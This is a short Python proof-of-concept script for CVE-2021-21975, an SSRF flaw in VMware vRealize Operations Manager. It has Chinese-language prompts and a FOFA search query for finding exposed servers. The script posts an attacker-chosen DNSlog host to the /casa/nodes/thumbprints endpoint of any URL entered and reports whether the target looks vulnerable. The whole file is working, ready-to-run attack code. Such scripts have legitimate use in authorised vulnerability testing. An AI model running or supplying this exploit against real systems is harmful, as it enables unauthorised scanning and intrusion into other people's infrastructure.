# CVE-2021-21975
# fofa：title=“vRealize Operations Manager​”

import requests
import urllib3

urllib3.disable_warnings()

def title():
    print("[-------------------------------------------------------------]")
    print("[-------- VMware vRealize Operations Manager SSRF漏洞 ---------]")
    print("[--------               CVE-2021-21975               ----------]")
    print("[--------       use:python3 CVE-2021-21975         ------------]")
    print("[--------              Author:Henry4E36            ------------]")
    print("[-------------------------------------------------------------]")


def target_url(url,dnslog):
    target_url = url + "/casa/nodes/thumbprints"
    headers = {
        "User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0",
        "Content-Type" : "application/json;charset=UTF-8"
    }
    data = f'["{dnslog}"]'
    try:
        res = requests.post(url=target_url,headers=headers,data=data,verify=False,timeout=5)
        if res.status_code == 200:
            print(f"[!]  \033[31m目标系统: {url} 可能存在SSRF漏洞，请检查DNSLog响应！\033[0m")
            print(f"[0]  响应为:{res.text}")
        else:
            print(f"[0]  目标系统: {url} 不存在SSRF漏洞")
    except Exception as e:
        print("[!]  目标系统出现意外错误！\n",e)


if __name__ == "__main__":
    title()
    url = str(input("[-] 请输入需要检测的URL:\n"))
    dnslog = str(input("[-] 请输入DNSlog:\n"))
    target_url(url,dnslog)